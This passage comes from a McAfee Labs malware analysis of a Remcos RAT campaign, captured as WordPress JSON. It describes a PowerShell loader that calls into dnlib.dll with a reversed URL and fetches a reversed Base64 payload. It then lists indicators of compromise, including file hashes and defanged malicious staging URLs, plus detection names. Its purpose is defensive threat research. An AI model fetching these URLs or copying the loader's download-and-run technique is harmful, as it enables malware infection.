https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure40-300x12.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure40-1024x41.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure40-768x31.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure40-1536x61.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure40-205x8.png 205w\" sizes=\"auto, (max-width: 1779px) 100vw, 1779px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\">Figure 40: Strings in PowerShell command<\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">Once the assembly \u201cdnlib.dll\u201d is loaded, it calls a method VAI from a type dnlib.IO.Home within the loaded assembly. This method is invoked with several arguments:<\/p>\n<ul style=\"font-weight: 400;\">\n<li><strong>txt.CVFGGR\/07\/771.69.431.19\/\/:ptth:<\/strong> This is a reversed URL (hxxp:\/\/91.134.96.177\/70\/RGGFVC.txt) that might point to another resource.<\/li>\n<li><strong>desativado (translated from Portuguese as &#8220;deactivated&#8221;):<\/strong> Passed multiple times as arguments. This is used as a parameter for deactivating certain functions.<\/li>\n<li><strong>RegAsm:<\/strong> This is the name of the .NET assembly registration tool, potentially indicating that the script is registering or working with assemblies on the machine.<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\"><strong>Below is the content of URL -hxxp:\/\/91.134.96.177\/70\/RGGFVC.txt:<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206622\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41.png\" alt=\"\" width=\"1888\" height=\"1005\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41.png 1888w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41-300x160.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41-1024x545.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41-768x409.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41-1536x818.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure41-205x109.png 205w\" sizes=\"auto, (max-width: 1888px) 100vw, 1888px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 41: Base64-encoded binary payload<\/span><\/span><\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p>The content shown above is a reversed, Base64-encoded binary payload, which, when decoded, results in the Remcos EXE payload.<\/p>\n<h2 style=\"font-weight: 400;\"><strong>Indicators of Compromise (IOCs)<\/strong><\/h2>\n<p style=\"font-weight: 400;\">Variant 1<\/p>\n<table style=\"font-weight: 400;\">\n<tbody>\n<tr>\n<td width=\"81\"><strong>File Type<\/strong><\/td>\n<td width=\"543\"><strong>SHA256<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"81\">Vbs<\/td>\n<td width=\"543\">d81847976ea210269bf3c98c5b32d40ed9daf78dbb1a9ce638ac472e501647d2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"font-weight: 400;\">Variant 2<\/p>\n<table style=\"font-weight: 400;\">\n<tbody>\n<tr>\n<td width=\"84\"><strong>File Type<\/strong><\/td>\n<td width=\"540\"><strong>SHA256<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"84\">Eml<\/td>\n<td width=\"540\">085ac8fa89b6a5ac1ce385c28d8311c6d58dd8545c3b160d797e3ad868c612a6<\/td>\n<\/tr>\n<tr>\n<td width=\"84\">Docx<\/td>\n<td width=\"540\">69ff7b755574add8b8bb3532b98b193382a5b7cbf2bf219b276cb0b51378c74f<\/td>\n<\/tr>\n<tr>\n<td width=\"84\">Rtf<\/td>\n<td width=\"540\">c86ada471253895e32a771e3954f40d1e98c5fbee4ce702fc1a81e795063170a<\/td>\n<\/tr>\n<tr>\n<td width=\"84\">Vbs<\/td>\n<td width=\"540\">c09e37db3fccb31fc2f94e93fa3fe8d5d9947dbe330b0578ae357e88e042e9e5<\/td>\n<\/tr>\n<tr>\n<td width=\"84\">dnlib.dll<\/td>\n<td width=\"540\">12ec76ef2298ac0d535cdb8b61a024446807da02c90c0eebcde86b3f9a04445a<\/td>\n<\/tr>\n<tr>\n<td width=\"84\">Remcos EXE<\/td>\n<td width=\"540\">997371c951144335618b3c5f4608afebf7688a58b6a95cdc71f237f2a7cc56a2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"font-weight: 400;\"><strong><br \/>\nURLs<\/strong><\/p>\n<table style=\"font-weight: 400;\">\n<tbody>\n<tr>\n<td width=\"631\">hxxps:\/\/dealc.me\/NLizza<\/td>\n<\/tr>\n<tr>\n<td width=\"631\">hxxp:\/\/91.134.96.177\/70\/picturewithmegetbacktouse.tIF<\/td>\n<\/tr>\n<tr>\n<td width=\"631\">hxxps:\/\/raw.githubusercontent.com\/NoDetectOn\/NoDetectOn\/refs\/heads\/main\/DetahNoth-V.txt<\/td>\n<\/tr>\n<tr>\n<td width=\"631\">hxxp:\/\/91.134.96.177\/70\/RGGFVC.txt<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"font-weight: 400;\"><strong><br \/>\nDetections:<\/strong><\/p>\n<p style=\"font-weight: 400;\">Variant 1<\/p>\n<table style=\"font-weight: 400;\">\n<tbody>\n<tr>\n<td width=\"312\"><strong>FileType<\/strong><\/td>\n<td width=\"312\"><strong>Detection<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"312\">VBS<\/td>\n<td width=\"312\">Trojan:Script\/Remcos.JD<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"font-weight: 400;\">Variant 2<\/p>\n<table style=\"font-weight: 400;\">\n<tbody>\n<tr>\n<td width=\"312\"><strong>FileType<\/strong><\/td>\n<td width=\"312\"><strong>Detection<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"312\">Docx<\/td>\n<td width=\"312\">Trojan:Office\/CVE20170199.D<\/td>\n<\/tr>\n<tr>\n<td width=\"312\">RTF<\/td>\n<td width=\"312\">Trojan:Office\/CVE201711882.A<\/td>\n<\/tr>\n<tr>\n<td width=\"312\">VBS<\/td>\n<td width=\"312\">Trojan: Script\/Remcos.AM<\/td>\n<\/tr>\n<tr>\n<td width=\"312\">Powershell<\/td>\n<td width=\"312\">Trojan: Script\/Remcos.PS1<\/td>\n<\/tr>\n<tr>\n<td width=\"312\">EXE<\/td>\n<td width=\"312\">Trojan:Win\/Genericy.AGP<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2 style=\"font-weight: 400;\"><strong>Conclusion<\/strong><\/h2>\n<p style=\"font-weight: 400;\">In conclusion, the rise of Remcos RAT highlights the evolving nature of cyber threats and the increasing sophistication of malware. As this remote access Trojan continues to target consumers through phishing emails and malicious attachments, the need for proactive cybersecurity measures has never been more critical. By understanding the tactics used by cybercriminals behind Remcos RAT and implementing robust defenses such as regular software updates, email filtering, and network monitoring, organizations can better protect their systems and sensitive data. Staying vigilant and informed about emerging threats like Remcos RAT is essential in safeguarding against future cyberattacks.<\/p>\n<h2 style=\"font-weight: 400;\"><strong>References<\/strong><\/h2>\n<p style=\"font-weight: 400;\"><a href=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/from-email-to-rat-deciphering-a-vb-script-driven-campaign\/\">https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/from-email-to-rat-deciphering-a-vb-script-driven-campaign\/<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Authored By Sakshi Jaiswal, Anuradha M In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat&#8230;.<\/p>\n","protected":false},"author":695,"featured_media":186105,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[],"coauthors":[4136],"class_list":["post-206036","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>The Stealthy Stalker: Remcos RAT | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Authored By Sakshi Jaiswal, Anuradha M In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat. It has emerged as a significant threat in\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"The Stealthy Stalker: Remcos RAT | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Authored By Sakshi Jaiswal, Anuradha M In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat. It has emerged as a significant threat in\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2024-12-11T08:38:14+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-06-06T08:40:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/09\/300x200_Blog_031324.png\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"The Stealthy Stalker: Remcos RAT\",\"datePublished\":\"2024-12-11T08:38:14+00:00\",\"dateModified\":\"2025-06-06T08:40:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/\"},\"wordCount\":2130,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/09\/300x200_Blog_031324.png\",\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/\",\"name\":\"The Stealthy Stalker: Remcos RAT | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/09\/300x200_Blog_031324.png\",\"datePublished\":\"2024-12-11T08:38:14+00:00\",\"dateModified\":\"2025-06-06T08:40:15+00:00\",\"description\":\"Authored By Sakshi Jaiswal, Anuradha M In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat. It has emerged as a significant threat in\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/09\/300x200_Blog_031324.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/09\/300x200_Blog_031324.png\",\"width\":300,\"height\":200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"The Stealthy Stalker: Remcos RAT\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"The Stealthy Stalker: Remcos RAT | McAfee Blog","description":"Authored By Sakshi Jaiswal, Anuradha M In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat. It has emerged as a significant threat in","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"The Stealthy Stalker: Remcos RAT | McAfee Blog","og_description":"Authored By Sakshi Jaiswal, Anuradha M In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat. It has emerged as a significant threat in","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2024-12-11T08:38:14+00:00","article_modified_time":"2025-06-06T08:40:15+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/09\/300x200_Blog_031324.png","type":"image\/png"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"The Stealthy Stalker: Remcos RAT","datePublished":"2024-12-11T08:38:14+00:00","dateModified":"2025-06-06T08:40:15+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/"},"wordCount":2130,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/09\/300x200_Blog_031324.png","articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/","name":"The Stealthy Stalker: Remcos RAT | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/09\/300x200_Blog_031324.png","datePublished":"2024-12-11T08:38:14+00:00","dateModified":"2025-06-06T08:40:15+00:00","description":"Authored By Sakshi Jaiswal, Anuradha M In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat. It has emerged as a significant threat in","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/09\/300x200_Blog_031324.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/09\/300x200_Blog_031324.png","width":300,"height":200},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"The Stealthy Stalker: Remcos RAT"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/206036","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=206036"}],"version-history":[{"count":31,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/206036\/revisions"}],"predecessor-version":[{"id":215177,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/206036\/revisions\/215177"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/186105"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=206036"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=206036"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=206036"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=206036"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}